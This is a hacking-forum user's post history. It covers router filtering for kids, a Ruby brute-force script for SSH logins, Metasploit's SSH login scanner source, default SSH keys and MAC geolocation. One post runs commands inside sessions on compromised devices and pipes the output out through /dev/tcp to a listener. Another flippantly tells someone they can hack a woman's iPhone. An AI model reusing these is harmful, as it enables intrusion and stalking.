-
Posts
939 -
Joined
-
Last visited
-
Days Won
22
Posts posted by i8igmac
-
-
6 hours ago, PoSHMagiC0de said:
If you have a raspberry pi you could always use pi-hole.
Do not know how advanced your router is but if you can setup separate DNS options for reserved clients then you can setup their DNS to point to pi-hole. Now you can blackhole any DNS requests to sites you do not want them having access to. Do not know if pi-hole can mac filter requests but I do know it can act as a DHCP server too. It will give you an insight of all the queries they make too..in essence their sites. It pretty much black holes any DNS requests for sites you do not want.
You could go with squid but you will need to tell the clients to use it via proxy settings. If you are really serious you could put a Snort/Saracata machine in line to do sniffing and filtering which will force them through it. Adding a cert trusted by the clients will give you insight into their https request contents as well.
I'm not doubting the idea here just pointing out the configuration I have explained with the use of a kid-safe-wifi-access point...
All devices associated will be effected by the iptable rules with out the need to configure proxy settings on each machine or each application...
You can forward the traffic to pi-hole or squid... the access point running iptable rules is simply a control point...
full control of traffic is full control.
-
11 hours ago, G-Stress said:
Thanks for all the info and quick response guys. My babies are (about to be 8) this Wednesday and 9. Their good kids I don't really worry about them getting curious at least not yet, but I don't want any accidents either.
I remember hearing about Squid years ago, but I've never messed with it. We primarily use Chrome, but being that IE would still be an option, I want to really lock things down at the router/ap level. YouTube, I agree there are some things on there not suitable for young kids, but that's the one thing where I trust and allow them to watch appropriate content. So far I've been blessed, the biggest issue there is those compilation videos where some clips are fine then some have a lot of cussing, etc.
I ran DD-WRT for years, but never played with iPtables. I guess now my concern is which would be more reliable/stable and do the best job? If Squid then what would be the best preferred setup via OS to run it on or in a VM? Also does iPtables or Squid do any form of reporting via emial or txt in the even anyone on that network tried to search for say porn or would I have to manually check logs?I will probably be using a nighthawk router and soon a UniFi AP Pro access point for that network setup.
If the traffic is controlled at the router then it would take more skill to bypass this filtering...
open source router OS that includes iptables really can be powerful.
The simplest method might simply be to redirect all the kids traffic to your squid machine.
http://www.penguintutor.com/kidsafe.php
I like how the squid config looks at this last weblink...
If you get your self a propper setup please share the configuration files.
Installing certificates on the kids devices also brings the ability to log the traffic.
- iptables -t nat -A PREROUTING -i eth0 -s ! squid-box -p tcp --dport 80 -j DNAT --to squid-box:3128
- iptables -t nat -A POSTROUTING -o eth0 -s local-network -d squid-box -j SNAT --to iptables-box
- iptables -A FORWARD -s local-network -d squid-box -i eth0 -o eth0 -p tcp --dport 3128 -j ACCEPT
-
get a cheap router from goodwill. Make sure you check the model number before purchase for dd-wrt compatibility... If it has wireless n or 5.8 ghz speeds then that's a SCORE...
flash with new open source firmware, configure the device as a kids wifi repeater...
Now you can setup custom iptable rules. I'm sure there are already documented iptable configs online for kid safe surfing...
-
34 minutes ago, digip said:
Um. Open a command prompt. Go to the place where "MyStuff" was(the aprent directory), and do the following:
dir /ahs
Now, CD into the listed hidden directory. Now do dir again(or add the /ahs if all files are set to the same attributes and hidden)
This does nothing other than change the files attributes, to hidden, and system, which can still be seen and accessed. Basically:
ren "poop" "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}" dir /ahs attrib -h -s "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}" "poop" dir
That is not entirely true, there are a few if expression's followed by a proper Echo.
-
post your command that generates the payload... confirm you used the correct ip address amd port...
what operating system is your machine running the payload.
here is a test you can check port 4444 is open... launch the exploit multi handler, then from your victim machine or any other machine do a port scan...
Nmap -p 4444 192.168.1.7
-
Is this connection inside the saame network
-
3 hours ago, digip said:
I just got one of those blocks, when pasting links from twitter. No code, just linking and quote from a tweet was enough to trigger it.
here is the post -
It can be extremely frustrating when you spend 30 minutes writing content then its all lost once you click submit.
It can be difficult to copy/paste information and organizing from my android, I do most of everything from my phone. it happen again lastnight from my labtop. Extremely frustrating...
I think it can be triggered when you don't use (code) tabs (quote) tabs.
The captcha seems to be effective enough. Disable the tarded filter. I doubt code injection will be successful from posting content...
may sound ironic but if anything this content filtering has made hak5 more vulnerable.
This could be the downfall of hak5. fresh content is important. This has prevent me from posting content several times.
-
My struggle is getting my hands on response data to check if 'Please login' exist
if there are any metasploit gurus around here i could use some help... i can get close but only when i dig deep into the libs...
-
i hope to place a if expression before SUCCESS happens.
if response.data.includes?("Please login:") #then submit the current CREDS scanner.ssh_socket.send_data(creds.user+"\n") scanner.ssh_socket.send_data(creds.pass+"\n") end
Here is the modules/auxiliary/scanner/ssh/ssh_login.rb
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'net/ssh' require 'net/ssh/command_stream' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'SSH Login Check Scanner', 'Description' => %q{ This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. }, 'Author' => ['todb'], 'References' => [ [ 'CVE', '1999-0502'] # Weak password ], 'License' => MSF_LICENSE, 'DefaultOptions' => {'VERBOSE' => false} # Disable annoying connect errors ) register_options( [ Opt::RPORT(22) ], self.class ) register_advanced_options( [ Opt::Proxies, OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end def rport datastore['RPORT'] end def session_setup(result, ssh_socket) return unless ssh_socket # Create a new session conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) merge_me = { 'USERPASS_FILE' => nil, 'USER_FILE' => nil, 'PASS_FILE' => nil, 'USERNAME' => result.credential.public, 'PASSWORD' => result.credential.private } info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})" s = start_session(self, info, merge_me, false, conn.lsock) self.sockets.delete(ssh_socket.transport.socket) # Set the session platform case result.proof when /Linux/ s.platform = "linux" when /Darwin/ s.platform = "osx" when /SunOS/ s.platform = "solaris" when /BSD/ s.platform = "bsd" when /HP-UX/ s.platform = "hpux" when /AIX/ s.platform = "aix" when /Win32|Windows/ s.platform = "windows" when /Unknown command or computer name/ s.platform = "cisco-ios" end s end def run_host(ip) @ip = ip cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], pass_file: datastore['PASS_FILE'], password: datastore['PASSWORD'], user_file: datastore['USER_FILE'], userpass_file: datastore['USERPASS_FILE'], username: datastore['USERNAME'], user_as_pass: datastore['USER_AS_PASS'], ) cred_collection = prepend_db_passwords(cred_collection) scanner = Metasploit::Framework::LoginScanner::SSH.new( host: ip, port: rport, cred_details: cred_collection, proxies: datastore['Proxies'], stop_on_success: datastore['STOP_ON_SUCCESS'], bruteforce_speed: datastore['BRUTEFORCE_SPEED'], connection_timeout: datastore['SSH_TIMEOUT'], framework: framework, framework_module: self, ) scanner.verbosity = :debug if datastore['SSH_DEBUG'] scanner.scan! do |result| credential_data = result.to_h credential_data.merge!( module_fullname: self.fullname, workspace_id: myworkspace_id ) case result.status when Metasploit::Model::Login::Status::SUCCESSFUL print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'" credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) session_setup(result, scanner.ssh_socket) :next_user when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}" scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? invalidate_login(credential_data) :abort when Metasploit::Model::Login::Status::INCORRECT vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'" invalidate_login(credential_data) scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? else invalidate_login(credential_data) scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? end end end end
-
here is a example of logging into a keyboard-interactive login shell.rb
this is a start of a brute force keyboard-interactive ssh
require 'rubygems' require 'net/ssh' # 73.9.26.15 host=ARGV[0] user=ARGV[1] pass=ARGV[2] result='' host_execution=false Net::SSH.start(host, user, :password => pass) do |ssh| # Open a channel channel = ssh.open_channel do |channel, success| channel.request_pty channel.exec("help") channel.on_data do |channel, data| print data sleep 3 # Send the password if data.include?("login:") channel.send_data "#{user}\n" # print("#{user}") end if data.include?("password :") channel.send_data("#{pass}\n") print("#{pass}") end if host_execution==false if data.include?('rkscli:') host_execution=true puts channel.send_data("help\n") channel.wait end end if host_execution==true if data.include?('rkscli:') # puts channel.send_data(gets) channel.wait end end end end # Wait for opened channel channel.wait end
-
What ports are used, when a target machine runs the trojin, does it connect back to your machine? If so then you would have configured port forwarding? What port if this?
You should monitor this port, its possible random traffic hit your open port but also possible your tool is a backdoor. hackforum is full of bs tools.
I may have misunderstood what you see. A vnc session? Maybe some one ran your trojin from a vm.
-
26 minutes ago, Sebkinne said:
So our Cloudflare setup blocked your request because it detected a RCE attack. No idea why that would trigger from some links in the post, but I would suggest you try posting them again.
This is the 3rd time. Previous attempts to post content included some ruby code.
Edit. Strange it works this time. Ill take screen shots next time this happens
;.,/'[]{8\=-~=~ `ls` system("uname") }
-
I'm looking to automate the login process on a my router running dropbear. This ssh service is configured in a way that would handle ssh logins with keyboard-interactive authentication.
if you are unsure what this is. You can test your local machines
ssh -o PreferredAuthentications=none -v 192.168.0.1
Authentications that can continue: publickey,password
Typically you would see (publickey,password)
In My situation this information is not displayed and I'm forced to login with a interactive session.
when you enter a interactive session you would see this below... notice how the user has already been determined by the command used but the session ask for the username
ssh admin@192.168.69.1
welcome to Ruckus running dropbear
Please login: admin
Password:******
I hope to use ruby net/ssh or even metasploit to login. So far all my test to automate the login process have failed... there is some documentation with ruby net/ssh and keyboard-interactive sessions but I can't find any examples online.
-
4 hours ago, Sebkinne said:
?
When i post a new thread, I'm redirected to a error with the string above saying there is a security problem, if this problem was false report the strimg to the network admin.
The last attempt to create a new thread only had a few links to metasploit on githib
-
3c0783109a6379bb
i cant post content here
-
3 hours ago, PoSHMagiC0de said:
Yelp, new installations of distros from iso generates new keys. If it is an img that is just copied to device like pi or phone the keys will be whatever they are in that image unless ssh is not installed in which case when it ssh server is installed it will generate new keys.
What about lot devices. Routers, network storage, arm devices. its possible these kind of devices where flashed with duplicate SSH_keys.
edit;
Or if a bunch of identicle devices where flashed with the same os, could the mac address be incorperated in generating the new ssh key or something predictable.
-
4 hours ago, PoSHMagiC0de said:
That pertains to prebuilt images for non PC devices. Nethunter and Kali for Raspberry PI or other Arm devices comes as a preinstalled OS image, same goes for the virtual images. Those will have default keys and you can get them from the images when downloaded. Anyone that used the ISO to install will have new keys because the package is installed at that moment hence it generates the keys right there.
So. I guess I misunderstood...
During installation, a new key is generated?
The same goes for routers and other little nas devices?
-
im looking for a collection of keys i could play around with, does any one know of a list of default keys for download? Does such a thing exist?
This metasploit module will attempt to loginto a host with a set KEY => kali./ssh/ssh_key
Just a example, any one who installs kali could be vulnerable to this type of attack, the key is the same on all kali machines, after kali is installed it is recamended this ssh_key be replaced.
so is there a list kf common default ssh keys any one has seen for download?
-
1 hour ago, halfikr said:
Iam so curious to someone. I want know her more. Can i hack her iphone with wifi connection? or something else can i do? please help me
Yes you can.
But before we talk about hacking, first watch 50 shades of grey. you must also watch a documentary on Gary Ridgway.
-
On 10/27/2017 at 9:02 AM, kdodge said:
on some *nix you can run netstat with the -p option to get the Process that is creating the connection. That might get you the backdoor that he is using.
netstat -ntp
yah its random generated application name.
217.23.5.33:443 ESTABLISHED agy46jk87
-
I found the CnC... all of these devices are connected to the same identicle ip...
Its a vpn service... so I guess all that is left to do is contact the vpn service and submit the logs...
turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done
first i started a listiner that greps for a specific ip...
then i sent 2 commands off to all current sessions
msf auxiliary(ssh_login) > sessions all -c 'netstat -nt > net' msf auxiliary(ssh_login) > sessions all -c 'cat < net > /dev/tcp/turdsplash.ip/8888
then the results pour into my netcat listener
turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done tcp 0 0 192.168.1.130:42074 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.1.130:44592 217.23.5.33:443 CLOSE_WAIT tcp 0 0 192.168.10.101:40764 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.10.102:47652 217.23.5.33:443 CLOSE_WAIT tcp 0 0 192.168.1.4:55475 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.1.4:39033 217.23.5.33:443 CLOSE_WAIT tcp 0 0 192.168.1.103:47597 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.1.103:56610 217.23.5.33:443 CLOSE_WAIT
i could turn this into a metasploit module or resource script.
-
On 8/5/2017 at 7:03 AM, Spoonish said:
♪♫♪Roy is here to save the day!♪♫
You could help in providing mind bottling theories to solving this question... how do you get shells...
The honey pot was fun but here was my next steps I took to exploring this botnet that is attacking my Super-L33t-wifi-router
There have been questions around here about seting up metasploit modules and configuring your exploits to set your reverse meterpreter with a public ip... I have answered in this video.
If any one wants a demonstration on the steps I took in setting up the honey pot and ip tables used to redirect and monitor traffic. I could make a video.
- 3
-
17 minutes ago, Just_a_User said:
Wasn't that something Sammy Kamkar did but google borked it. He says its still possible for the motivated reader.
"I then take the MAC address and send it along to Google Location Services. This is an HTTP-based service where router MAC addresses are mapped to approximate GPS "
This looks interesting. I was thinking client mac addresses is what I maybe looking for.
-
Google used to drive around and log mac addresses of access points and log gps location until this raised privacy concerns.
So what they did after this was used smart phones to collect this data in the same manner but with the proper terms and conditions accepted by the user.
One of my habits is watching traffic on my network. I have seen my old samsung s5 sending mac adddress with gps x,y locations in plain text. This was a running service that sparked my intrest.
this information can be used to locate a labtop, tablet, cell phone or anything with a mac address.
If millions Of smart phone users have been collecting this data and building googles database. It should be no problem to search for a mac address and retrieve a gps location.
Here is a example of a mac address and gps logger/tracker. https://cellphonetrackers.org/gsm/wifi-tracker.php
Here is an google api https://developers.google.com/maps/documentation/geolocation/intro
Any one know if google has given public accesss to this database?
Which Language ?
in Applications & Coding
Posted
maybe 6 ysars ago I chose ruby. I was interested in writing metasploit modules.
Pthon has less limitations. I wouldn't bother with c++ until you figure out a years worth of python or ruby